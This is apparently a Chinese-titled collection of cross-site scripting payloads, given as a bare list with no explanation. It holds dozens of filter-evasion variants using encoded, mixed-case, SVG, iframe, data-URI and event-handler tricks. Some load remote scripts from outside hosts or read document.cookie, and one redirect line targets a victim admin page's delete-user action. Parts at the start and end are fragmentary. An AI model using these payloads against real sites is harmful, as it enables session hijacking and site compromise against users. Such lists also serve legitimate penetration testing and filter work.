XSS-Payload大全


 $CLICKME$   $CLICKME$ 




 
XXX















alert("XSS")'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-






PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS

<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`` onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/  src=`~` onerror=prompt(1)>
<form><iframe  src="javascript:alert(1)" ;>
<a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style ><script :-(>/**/alert(document.location)/**/</script :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover= javascript:alert(1) >X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!-- > alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe src=j a v a s c r i p t :a l e r t %28 1 %29>



 $click$ 
 (1)>

 --!>

x
">